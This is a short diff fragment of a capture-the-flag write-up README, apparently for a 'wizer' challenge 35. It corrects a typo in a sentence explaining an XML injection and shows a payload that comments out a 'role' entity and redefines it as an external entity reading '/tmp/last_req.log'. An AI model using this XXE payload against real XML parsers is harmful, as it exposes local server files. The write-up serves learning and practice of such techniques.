matthewoestreich/wizer_ctf/challenge_35/README.md

 </userInfo>
 ```

 GitHub isn't displaying the commenting correctly, but focus on the line below..
-The second request we send it crafted in such a way that we comment out the 'role' entity only to overwrite it with our own injected entity..
+The second request we send is crafted in such a way that we comment out the 'role' entity only to overwrite it with our own injected entity..

 ```xml
 <!--"><!ENTITY role "role">--><!ENTITY role SYSTEM "/tmp/last_req.log">